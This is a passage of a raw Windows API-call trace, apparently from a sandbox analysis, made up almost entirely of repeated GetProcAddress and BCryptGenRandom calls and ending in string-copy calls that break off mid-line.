0x7ffc5bcc36b0 [0272.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01e96, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a01e96) returned 0x0 [0272.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01ec0, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x3a01ec0) returned 0x0 [0272.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01ee9, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a01ee9) returned 0x0 [0272.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.582] GetProcessHeap () returned 0x440000 [0272.582] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0272.582] lstrcpyA (in: lpString1=0x473da0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0272.582] lstrcatA (in: lpString1="\x04", 